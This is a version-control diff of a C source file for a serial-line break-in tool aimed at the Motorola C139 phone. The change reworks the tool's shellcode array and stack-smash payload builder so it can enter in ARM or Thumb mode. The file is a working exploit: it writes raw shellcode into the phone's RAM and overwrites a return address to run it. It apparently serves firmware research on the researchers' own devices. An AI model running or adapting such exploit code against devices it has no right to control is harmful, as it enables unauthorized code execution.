comparison rvinterf/lowlevel/tfc139.c @ 983:7166c8311b0d

tfc139 reworked to support both ARM and Thumb entry
author Mychaela Falconia <falcon@ivan.Harhan.ORG>
date Thu, 10 Dec 2015 08:07:47 +0000
parents 0d7cc054ef72
children 8c83777f856c
982:461f7ee5f254 983:7166c8311b0d
25 char *logfname; 25 char *logfname;
26 FILE *logF; 26 FILE *logF;
27 time_t logtime; 27 time_t logtime;
28 int no_output; /* for output.c */ 28 int no_output; /* for output.c */
29 29
30 int wakeup_after_sec = 7; 30 int wakeup_after_sec = 1;
31 31
32 /* see ../../target-utils/tf-breakin/payload.S for the source */ 32 /* see ../../target-utils/tf-breakin/payload.S for the source */
33 static u_char iram_payload[112] = { 33 static u_char shellcode[114] = {
34 0xD3, 0xF0, 0x21, 0xE3, 0x58, 0x10, 0x9F, 0xE5, 34 0x78, 0x47, 0xC0, 0x46, 0xD3, 0xF0, 0x21, 0xE3,
35 0xF5, 0x00, 0xA0, 0xE3, 0xB2, 0x00, 0xC1, 0xE1, 35 0x50, 0x10, 0x9F, 0xE5, 0xF5, 0x00, 0xA0, 0xE3,
36 0xA0, 0x00, 0xA0, 0xE3, 0xB2, 0x00, 0xC1, 0xE1, 36 0xB2, 0x00, 0xC1, 0xE1, 0xA0, 0x00, 0xA0, 0xE3,
37 0x48, 0x60, 0x9F, 0xE5, 0x05, 0x00, 0xD6, 0xE5, 37 0xB2, 0x00, 0xC1, 0xE1, 0x40, 0x60, 0x9F, 0xE5,
38 0x20, 0x00, 0x10, 0xE3, 0xFC, 0xFF, 0xFF, 0x0A, 38 0x05, 0x00, 0xD6, 0xE5, 0x20, 0x00, 0x10, 0xE3,
39 0x2C, 0x10, 0x8F, 0xE2, 0x06, 0x20, 0xA0, 0xE3, 39 0xFC, 0xFF, 0xFF, 0x0A, 0x38, 0x10, 0x8F, 0xE2,
40 0x01, 0x00, 0xD1, 0xE4, 0x00, 0x00, 0xC6, 0xE5, 40 0x06, 0x20, 0xA0, 0xE3, 0x01, 0x00, 0xD1, 0xE4,
41 0x01, 0x20, 0x52, 0xE2, 0xFB, 0xFF, 0xFF, 0x1A, 41 0x00, 0x00, 0xC6, 0xE5, 0x01, 0x20, 0x52, 0xE2,
42 0x05, 0x00, 0xD6, 0xE5, 0x40, 0x00, 0x10, 0xE3, 42 0xFB, 0xFF, 0xFF, 0x1A, 0x05, 0x00, 0xD6, 0xE5,
43 0xFC, 0xFF, 0xFF, 0x0A, 0x18, 0x10, 0x9F, 0xE5, 43 0x40, 0x00, 0x10, 0xE3, 0xFC, 0xFF, 0xFF, 0x0A,
44 0x01, 0x2C, 0xA0, 0xE3, 0xB0, 0x20, 0xC1, 0xE1, 44 0x10, 0x10, 0x9F, 0xE5, 0x01, 0x2C, 0xA0, 0xE3,
45 0x00, 0xF0, 0xA0, 0xE3, 0x02, 0x02, 0x02, 0x4F, 45 0xB0, 0x20, 0xC1, 0xE1, 0x00, 0xF0, 0xA0, 0xE3,
46 0x4B, 0x02, 0x00, 0x00, 0x02, 0xF8, 0xFF, 0xFF, 46 0x02, 0xF8, 0xFF, 0xFF, 0x00, 0x58, 0xFF, 0xFF,
47 0x00, 0x58, 0xFF, 0xFF, 0x10, 0xFB, 0xFF, 0xFF 47 0x10, 0xFB, 0xFF, 0xFF, 0x02, 0x02, 0x02, 0x4F,
48 0x4B, 0x02
48 }; 49 };
49 50
50 static unsigned iram_load_addr = 0x800000; 51 static unsigned shellcode_load_addr = 0x800000;
51 static unsigned stack_smash_addr = 0x837C54; 52 static unsigned stack_smash_addr = 0x837C54;
53 static int thumb_entry = 0;
52 54
53 static u_char stack_smash_payload[4]; 55 static u_char stack_smash_payload[4];
54 56
55 static char *target_tty_port; 57 static char *target_tty_port;
56 58
75 csum ^= pkt[i]; 77 csum ^= pkt[i];
76 pkt[i] = csum; 78 pkt[i] = csum;
77 send_pkt_to_target(pkt, i + 1); 79 send_pkt_to_target(pkt, i + 1);
78 } 80 }
79 81
82 static void
83 build_stack_smash_payload()
84 {
85 unsigned jump_addr;
86
87 jump_addr = shellcode_load_addr;
88 if (thumb_entry)
89 jump_addr += 1;
90 else
91 jump_addr += 4;
92 stack_smash_payload[0] = jump_addr;
93 stack_smash_payload[1] = jump_addr >> 8;
94 stack_smash_payload[2] = jump_addr >> 16;
95 stack_smash_payload[3] = jump_addr >> 24;
96 }
97
80 main(argc, argv) 98 main(argc, argv)
81 char **argv; 99 char **argv;
82 { 100 {
83 extern char *optarg; 101 extern char *optarg;
84 extern int optind; 102 extern int optind;
85 int c; 103 int c;
86 fd_set fds; 104 fd_set fds;
87 105
88 baudrate_name = "57600"; /* what C139 firmware uses */ 106 baudrate_name = "57600"; /* what C139 firmware uses */
89 while ((c = getopt(argc, argv, "a:B:l:s:w:")) != EOF) 107 while ((c = getopt(argc, argv, "a:B:l:s:tw:")) != EOF)
90 switch (c) { 108 switch (c) {
91 case 'a': 109 case 'a':
92 iram_load_addr = strtoul(optarg, 0, 16); 110 shellcode_load_addr = strtoul(optarg, 0, 16);
93 continue; 111 continue;
94 case 'B': 112 case 'B':
95 baudrate_name = optarg; 113 baudrate_name = optarg;
96 continue; 114 continue;
97 case 'l': 115 case 'l':
98 logfname = optarg; 116 logfname = optarg;
99 continue; 117 continue;
100 case 's': 118 case 's':
101 stack_smash_addr = strtoul(optarg, 0, 16); 119 stack_smash_addr = strtoul(optarg, 0, 16);
120 continue;
121 case 't':
122 thumb_entry = 1;
102 continue; 123 continue;
103 case 'w': 124 case 'w':
104 wakeup_after_sec = strtoul(optarg, 0, 0); 125 wakeup_after_sec = strtoul(optarg, 0, 0);
105 continue; 126 continue;
106 case '?': 127 case '?':
124 } 145 }
125 setlinebuf(logF); 146 setlinebuf(logF);
126 fprintf(logF, "*** Log of TFC139 break-in session ***\n"); 147 fprintf(logF, "*** Log of TFC139 break-in session ***\n");
127 } 148 }
128 time(&logtime); 149 time(&logtime);
129 output_line("Sending IRAM payload"); 150 output_line("Sending shellcode RAM write");
130 send_compal_memwrite(iram_load_addr, iram_payload, sizeof iram_payload); 151 send_compal_memwrite(shellcode_load_addr, shellcode, sizeof shellcode);
131 stack_smash_payload[0] = iram_load_addr; 152 build_stack_smash_payload();
132 stack_smash_payload[1] = iram_load_addr >> 8;
133 stack_smash_payload[2] = iram_load_addr >> 16;
134 stack_smash_payload[3] = iram_load_addr >> 24;
135 for (;;) { 153 for (;;) {
136 FD_ZERO(&fds); 154 FD_ZERO(&fds);
137 FD_SET(target_fd, &fds); 155 FD_SET(target_fd, &fds);
138 c = select(target_fd+1, &fds, 0, 0, 0); 156 c = select(target_fd+1, &fds, 0, 0, 0);
139 time(&logtime); 157 time(&logtime);